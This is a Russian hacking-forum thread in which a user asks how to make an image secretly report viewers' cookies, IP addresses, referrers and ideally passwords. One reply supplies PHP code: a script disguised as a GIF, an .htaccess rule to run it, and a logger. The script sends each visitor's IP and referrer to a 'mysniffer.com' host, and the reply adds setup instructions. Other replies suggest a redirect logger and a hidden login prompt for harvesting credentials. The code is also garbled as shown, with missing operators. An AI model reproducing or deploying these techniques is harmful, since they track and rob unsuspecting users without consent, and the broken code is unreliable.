Картинка ворует cookie

Discussion in 'Реверсинг' started by akkolt, 9 Feb 2010.

  1. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток, очень нужно реализовать подобную вещь:
    Пользователь открывает страницу с изображением (допустим аватаркой) при просмотре данного изображения, оно отправляет cookies данного пользователя на определенный email
    Использование сторонних скриптов на странице не прокатит, скрипт должен быть внедрен прямо в изображение
    В прочем многого то мне получать и не нужно (лишь ip, страница, где находилось изображение... Хотя от паролей бы не отказался.. но это уже лишь ради шалости )) )
    Мучаюсь над этим вопросом уже 2й день, в интернете абсолютно ничего на эту тему нет... =-(

    Может быть существует некий сниффер, обрабатывающий избражение, которое находится на стороннем хосте, а не на самом сервере сниффера? Такое решение тоже подойдет
    Слышал про Img_Sniffcookgrab.exe , но так нигде найти не смог
     
  2. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    элементарно.
    изображение - лишь часть веб-контента, с JScript можно и не такое.

    пассы снимаю не так. and no word anymore.
     
  3. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Дело в том, что есть только изображение, сторонние скрипты в данном случае - не выход
     
  4. lis84

    lis84 Banned

    Joined:
    28 Apr 2009
    Messages:
    59
    Likes Received:
    10
    Reputations:
    1
    Есть подозрение что такое невозможно. (если только на картинку ссыль)
    Если есть возможность сослаться на скрипт который генерит картинку, то тогда можно :)
    Типа линеечек которые в подписи любят многие пихать, она генерится скриптом.

    ПыСы. А ещё интересно где тут реверсинг?
    ПыПыСы. Ну и кукисы разумееццо тоже, а вот ip юзера и страница откуда отрыли однако реально.
     
    #4 lis84, 10 Feb 2010
    Last edited: 10 Feb 2010
  5. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Извиняюсь, ошибся разделом
    Ну куки в принципе мне не так и нужны, мне нужно знать ip и реферрор, вроде видел подобеный код на php, но не знаю, как им воспользоваться...
     
  6. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Ну вот простецкий вариант. Скрипт img.gif, генерящий картинку
    PHP:
    <?php
      $im 
    imagecreatefromgif ('image.gif');
      if (
    $im) {
        
    header ('Content-Type: image/gif');
        
    imagegif ($im);
        
    imagedestroy ($im);
        
    $sock fsockopen ('mysniffer.com'80$errno$errstr30);
        if (
    $sock) {
          
    fwrite ($sock"GET /sniff.php?ip=" getenv ('REMOTE_ADDR')
            . 
    "&referer=" getenv ('HTTP_REFERER'
            . 
    " HTTP/1.1\r\nHost: server.com\r\nConnection: close\r\n\r\n");
          
    fclose ($sock);
        }
      }
    ?>
    Файл .htaccess для него
    Code:
    AddType application/x-httpd-php .gif
    
    Сам "сниффер" - sniff.php
    PHP:
    <?php
      $log 
    'sniff.log';
      if (!empty (
    $_GET)) {
        if (
    file_exists ($log) && is_writeable ($log))
          
    file_put_contents ($log$_SERVER['QUERY_STRING']);
        else
          echo 
    'File doesn\'t exist or not writeable';
      }
    ?>
     
  7. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Если можно, то пожалуйста подробнее, как это использовать?
    Первый скрипт как я понял вставляется в файл .gif но где указать изображение, которое сгенерится?
    Затем создается файл .htaccess Куда его девать?
    sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?
     
    #7 akkolt, 10 Feb 2010
    Last edited: 10 Feb 2010
  8. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Хех...это же элементарно. если хостинга нету. Регаешься тут ТАм тебе дадут ссылку на картинку такого вида www.сайт/userbars/img_4_4383.gif - её шлеш на почту и ждешь на сайте где регался логи. С той инфой которая тебе нужна. :D
     
  9. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Это элементарно, читайте внимательнее, в первом посте сказано, что есть лишь картинка, больше ничего...
    Мне не нужно никого ломать, для этого есть более подходящие способы
    Если и использовать сниффер, то только тот, что способен обработать левое изображение, т.е. не кидать ссылку пользователю (п.с. изображение будет вообще статично в сети интернет, ни кому оно передаваться не будет), а загрузить изображение на хост, и затем указать ссылку на это изображение в настройках сниффера, так, чтобы сниффер его обрабатывал. Но ни как не наоборот
     
  10. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    akkolt, путь к картинке прописан в строке
    PHP:
    $im imagecreatefromgif ('image.gif');
    Картинка лежит рядом с файлом. Имя файла может быть любым (.GIF). .htaccess кладется также в тот же каталог, где лежит img.gif
    Именно так, только пути и урлы правильно в скриптах пропишите. И создайте пустой файл sniff.log рядом со сниффером с правами 0666.
     
  11. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Нет, такой вариант не подойдет, картинка должна лежать отдельно на на любом другом сервере
     
  12. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    а что мешает программно брать картинку, откуда хочется?
     
  13. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    то, что ситуация такова, что у меня нет возможности залить изображение на сниффер, могу лишь указать ссылку на нужное изображение в интернете
     
  14. akkolt

    akkolt New Member

    Joined:
    8 Feb 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Эмм.. или я не правильно понял вопрос?
     
  15. Fliplab

    Fliplab Elder - Старейшина

    Joined:
    29 Jul 2008
    Messages:
    123
    Likes Received:
    20
    Reputations:
    3
    Аккольт,вот читаю твои посты и думаю,либо ты сам не знаешь что тебе надо,либо ты вобще впервые слышишь про пхп и т.п
     
  16. Red_EYEs

    Red_EYEs Member

    Joined:
    7 Aug 2009
    Messages:
    32
    Likes Received:
    12
    Reputations:
    11
    если написать скрипт который выдаёт в загаловке
    Location: /image.png

    и при этом запоминает ip и реферера
     
  17. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    Я понял, чего хочет ТС, и отвечаю: так сделать нельзя.

    </thread>
     
  18. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    полностью согласен картинка и скрипты должны находиться на том сайте на который заходит пользователь у которого ты хочешь получить ip и надо что бы картинка выполнярась как php код а так как файл .htaccess и php файлы на сервер где размещен сайт никак незальешь то у тебя и ничего неполучиться....
     
  19. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    я тут немного вспомнил...непомню кто писал но вроде D_x nb бейсак идентификация в картинке которая грузится с удаленного сервера у кого такое осталось а то что то у меня полерялась
     
  20. Opsis

    Opsis Banned

    Joined:
    24 Jan 2010
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    а ты одного типа лдомануть хочеш или юзать весь инет?)